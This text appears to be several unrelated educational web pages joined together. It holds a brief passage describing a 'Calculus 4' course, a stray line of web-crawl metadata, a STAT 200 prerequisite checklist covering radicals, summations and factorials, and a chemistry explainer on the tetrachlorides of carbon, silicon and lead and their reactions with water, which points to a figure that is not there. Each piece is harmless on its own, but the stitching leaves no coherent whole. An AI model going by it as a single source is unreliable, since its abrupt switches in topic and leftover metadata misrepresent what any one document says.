Calculus, by its nature, is a very difficult course to take, yet rewarding once completed. Whether it is hard or not is subjective and depends on the student's effort and willingness to learn. It is important that you are well prepared by your previous calculus courses before taking up Calc 4.
We have provided a brief but functional definition of possible Calculus 4 courses. Though the course varies between institutions, we can agree that Calculus 4 is an extensive exploration of the subject. Here are some of the important points tackled in this guide.
- Calculus 4 is a course proceeding previous calculus courses and may cover Differential calculus, Integral calculus, or Vector calculus.
- Differential calculus deals mainly on the dynamics and solutions of differential equations.
- Integral calculus focuses on integration techniques and its application on areas and volumes.
- Vector calculus is concerned with analysis, differentiation, and integration applied on vector fields.
We encourage you to explore these topics yourself — there’s an untapped world of mathematical discovery waiting for you! | <urn:uuid:336054aa-ff16-4c2f-94a7-6edd8937568d> | CC-MAIN-2023-14 | https://www.storyofmathematics.com/calc-4/ | s3://commoncrawl/crawl-data/CC-MAIN-2023-14/segments/1679296949694.55/warc/CC-MAIN-20230401001704-20230401031704-00616.warc.gz | en | 0.876541 | 1,558 | 3.09375 | 3 |
Knowledge of the following mathematical operations is required for STAT 200:
- Radicals (i.e., square roots)
- Summations \(\left( \sum \right) \)
- Factorials (!)
Additionally, the ability to perform these operations in the appropriate order is necessary. Use these materials to check your understanding and preparation for taking STAT 200.
We want our students to be successful! And we know that students that do not possess a working knowledge of these topics will struggle to participate successfully in STAT 200.
Are you ready? As a means of helping students assess whether what they currently know and can do meets the expectations of STAT 200 instructors, the online program has put together a brief review of these concepts and methods. This is then followed by a short self-assessment exam that will help give you an idea of whether this prerequisite knowledge is readily available for you to apply.
1. Review the concepts and methods on the pages in this section of this website.
2. Download and complete the Self-Assessment Exam.
3. Review the Self-Assessment Exam Solutions and determine your score.
Your score on this self-assessment should be 100%! If your score is below this you should consider further review of these materials and are strongly encouraged to take MATH 021 or an equivalent course.
If you have struggled with the methods that are presented in the self-assessment, you will indeed struggle in the courses that expect this foundation.
Note: These materials are NOT intended to be a complete treatment of the ideas and methods used in algebra. These materials and the self-assessment are intended simply as an 'early warning signal' for students. Also, please note that completing the self-assessment successfully does not automatically ensure success in any of the courses that use these foundation materials. Please keep in mind that this is a review only. It is not an exhaustive list of the material you need to have learned in your previous math classes. This review is meant only to be a simple guide of things you should remember and that are built upon in STAT 200.
Chlorides of Group 4 Elements
This page briefly examines the tetrachlorides of carbon, silicon, and lead, as well as lead(II) chloride. It considers the compounds' structures, stability, and reactions with water.
Carbon, silicon and lead tetrachlorides
Each of these compounds has the formula XCl4. They are simple covalent molecules with a typical tetrahedral shape. They are liquids at room temperature (although lead(IV) chloride tends to decompose at room temperature to give lead(II) chloride and chlorine gas—see the discussion below).
Lead(II) chloride, PbCl2
Lead(II) chloride is a white solid, melting at 501°C. It is slightly soluble in cold water, but its solubility increases with temperature. Lead(II) chloride is essentially ionic in character.
At the top of Group 4, the most stable oxidation state is +4. This is the oxidation state of carbon and silicon in CCl4 and SiCl4. These compounds have no tendency to break down into dichlorides. However, the relative stability of the +4 oxidation state decreases down the group, and the +2 oxidation state becomes the most stable by the time lead is reached. Lead(IV) chloride decomposes at room temperature to form the more stable lead(II) chloride and chlorine gas.
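This decomposition can be written as:

\[ PbCl_4 \rightarrow PbCl_2 + Cl_2\]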
Reaction with water (hydrolysis)
Carbon tetrachloride (tetrachloromethane)
Carbon tetrachloride has no reaction with water. When added to water, it forms a separate layer underneath the layer of water. If a water molecule were to react with carbon tetrachloride, the oxygen atom in the water molecule would need to attach itself to the carbon atom via the oxygen's lone pair. A chlorine atom would be displaced in the process. There are two problems with this idea.
First, chlorine atoms are so bulky and the carbon atom so small that the oxygen atom is sterically hindered from attacking the carbon atom.
Even if this were possible, there would be considerable cluttering around that carbon atom before the chlorine atom breaks away completely, causing a lot of repulsion between the various lone pairs on all the atoms surrounding the carbon, as shown below:
This repulsion makes the transition state very unstable. An unstable transition state indicates a high activation energy for the reaction.
The other problem is that there is no appropriate empty carbon orbital the oxygen lone pair can occupy.
If the oxygen could attach before the chlorine starts to break away, there would be an advantage: forming a bond releases energy, and that energy would be readily available for breaking a carbon-chlorine bond. In the case of a carbon atom, however, this is impossible.
The situation is different with silicon tetrachloride. Silicon is larger, so there is more room for the water molecule to attack; the transition state is less cluttered. Silicon has an additional advantage: there are empty 3d orbitals available to accept a lone pair from the water molecule. Carbon lacks this advantage because there are no empty 2-level orbitals available.
The oxygen atom can therefore bond to silicon before a silicon-chlorine bond breaks, making the whole process energetically easier. In practice, silicon tetrachloride reacts violently with water, forming white solid silicon dioxide and HCl gas.
\[SiCl_4 + 2H_2O \rightarrow SiO_2 + 4HCl\]
Liquid SiCl4 fumes in moist air for this reason—it reacts with water vapor in the air.
Lead tetrachloride (lead(IV) chloride)
The reaction of lead(IV) chloride with water is just like that of silicon tetrachloride. Lead(IV) oxide is produced as a brown solid, and fumes of hydrogen chloride are given off (this can be confused with the decomposition of the lead(IV) chloride, which gives lead(II) chloride and chlorine gas as mentioned above).
\[ PbCl_4 + 2H_2O \rightarrow PbO_2 + 4HCl\]
Unlike the tetrachlorides, lead(II) chloride can be considered ionic in nature. It is slightly soluble in cold water, but more soluble in hot water. Water solubility involves disruption of the ionic lattice and hydration of the lead(II) and chloride ions to give Pb2+(aq) and Cl-(aq).
Contributors and Attributions
Jim Clark (Chemguide.co.uk)